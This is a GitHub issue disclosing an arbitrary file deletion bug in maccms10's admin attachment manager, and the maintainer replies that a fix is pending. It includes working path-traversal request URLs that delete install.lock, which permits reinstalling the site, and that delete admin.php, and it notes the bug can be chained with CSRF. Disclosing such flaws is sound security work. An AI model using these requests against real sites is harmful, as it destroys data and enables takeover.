Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Any file can be deleted in the background #79

Closed
1979139113 opened this issue Oct 22, 2019 · 1 comment
Closed

Any file can be deleted in the background #79

1979139113 opened this issue Oct 22, 2019 · 1 comment

Comments

@1979139113
Copy link

1979139113 commented Oct 22, 2019

In the ""超级控制台->基础->附件管理"", delete function can delete any file, including /application/data/install/install.lock

After the administrator logged in, open the following link.

http://127.0.0.1/maccms10/admin.php/admin/images/del.html?ids%5B%5D=/upload/../application/data/install/install.lock

File install.lock will be deleted

Then visit install.php

This can reinstall the entire site.

图片

delete admin.php

http://127.0.0.1/maccms10/admin.php/admin/images/del.html?ids%5B%5D=/upload/../admin.php

In general, it can be used with CSRF vulnerabilities to delete arbitrary files.

@magicblack
Copy link
Owner

修复~等待发包

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants